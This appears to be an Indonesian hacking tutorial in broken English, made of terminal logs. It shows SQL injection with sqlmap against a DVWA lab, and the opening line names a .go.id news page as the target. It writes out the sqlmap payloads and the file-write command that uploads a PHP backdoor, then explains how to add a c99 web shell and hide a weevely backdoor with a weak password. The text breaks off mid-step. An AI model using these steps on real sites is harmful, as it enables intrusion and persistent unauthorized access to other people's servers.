Belajar: EXPLOIT DVWA AND UPLOAD BACKDOOR HIDDEN BACDOR

1.target.go.id/idex.php?id_berita=12&
Open terminal..

1.1 ┌─[budhya@parrot]─[~]
└──╼ $sudo su
[sudo] password for budhya:
┌─[root@parrot]─[/home/budhya]
└──╼ #msfconsole


MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl MMMMM             MMMMM JMMMM
MMMNl MMMMMMMN       NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM   MMMMMMM   MMMMM jMMMM
MMMNI MMMMM   MMMMMMM   MMMMM jMMMM
MMMNI MMMNM   MMMMMMM   MMMMM jMMMM
MMMNI WMMMM   MMMMMMM   MMMM# JMMMM
MMMMR ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN ?MM             MM? NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.pro

Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.11.3-2015062101 [core:4.11.3.pre.2015062101 api:1.0.0]]
+ -- --=[ 1463 exploits - 838 auxiliary - 229 post        ]
+ -- --=[ 428 payloads - 37 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >

┌─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l simple.txt
_

open new terminal

┌─[✗]─[root@parrot]─[/home/budhya]

└──╼ #cd /usr/share/webshells/php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #

└──╼ #ls
findsock.c php-backdoor.php php-findsock-shell.php php-reverse-shell.php qsd-php-backdoor.php simple-backdoor.php
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #

nex copy file 2
└──╼ #cp php-backdoor.php ~
┌─[root@parrot]─[/usr/share/webshells/php]
└──╼ #
next loking finished cofy
┌─[root@parrot]─[~]
└──╼ #pwd
/root
┌─[root@parrot]─[~]
└──╼ #ls
12 hari kmaren Desktop          maltego_3.6.1.6748-0kali2_all.deb New Graph (1).mtgx sessions          Videos
9844.py         Documents        MaltegoChlorineCE.3.6.0.6640.deb   New Graph (2).mtgx Templates         VirtualBox VMs
abuy.php        Downloads        Metasploitable2-Linux              php-backdoor.php    tmp.php           vpngate_vpn239494852.opengw.net_udp_1947.ovpn
abuy.py         HARI 8           Music                              Pictures            TUGAS MLAM INI . vpngate_vpn800695980.opengw.net_udp_1605.ovpn
blackhat.jpg    malam ini tugas NewFolder                          Public              ub 10.04.vdi      Wireles hacking
┌─[root@parrot]─[~]
└──╼ #

next step upload backdoor
─[✗]─[root@parrot]─[/home/budhya]
└──╼ #sqlmap -l /home/budhya/dvwaheader.txt -p "id" --file-write=/root/php-backdoor.php --file-dest=/www/dvwa/hackable/uploads/abouy.php
         _
apabila bacdoor telah berhasil di upload maka akan ada pemberitauan pada terminal

Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=gdyvv' AND (SELECT 2276 FROM(SELECT COUNT(*),CONCAT(0x716b786a71,(SELECT (CASE WHEN (2276=2276) THEN 1 ELSE 0 END)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GfHD'='GfHD&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=gdyvv' UNION ALL SELECT NULL,CONCAT(0x716b786a71,0x426b64424b7872745956,0x7176707171)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (SELECT)
    Payload: id=gdyvv' AND (SELECT * FROM (SELECT(SLEEP(5)))vTIN) AND 'qWtS'='qWtS&Submit=Submit
---
do you want to exploit this SQL injection? [Y/n]
[22:01:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[22:01:48] [INFO] fingerprinting the back-end DBMS operating system
[22:01:49] [WARNING] reflective value(s) found and filtering out
[22:01:49] [INFO] the back-end DBMS operating system is Linux
[22:01:49] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file '/root/php-backdoor.php' has been successfully written on the back-end DBMS file system (/var/www/dvwa/hackable/uploads/abouy.php)? [Y/n]
[22:01:50] [INFO] the remote file /var/www/dvwa/hackable/uploads/abouy.php is larger than the local file /root/php-backdoor.php
[22:01:50] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.sqlmap/output/results-09032015_1001pm.csv'

the next is prosesing upload backdoor

the next uploading bacdor is finish

next looking for dvwa bacdoor is uploading thr next runing bacdor
search name backdoor upload
thr simple upload bacdor the name kis abuy

next write touch enter next ls for luking diractory

for this backdoor you create new backdor in
http://www.r57shell.net/ from this situs you download bacdor the name c99hell the next you exstraxhere open

and the next upload again bacdor is finis download and exstrak here and rename you upload again in DVWA

after open and exstrak you rename file my sample is rename (jagotarung.php) next simple finished upload bacdor 2 and brouse loking in
http://192.168.1.123/dvwa/jagotarung.php

the next you must delete becdor 1 ..because septy bacdor 2
hackable,upload,next cklis,,withselet.delete,konfirm

next the simple edit in html name WELCOME rename FOR JAGO TARUNG

next hidden your bacdoor bi septy
open new terminal write
┌─[root@parrot]─[/home/budhya]
└──╼ # weevely generate 12345 tarung.php

the next lalu enter kalo ber hasil maka mun cul
[generate.php] Backdoor file 'tarung.php' created with password '12345'

┌─[root@parrot]─[/home/budhya]
└──╼ #cat tarung.php
<?php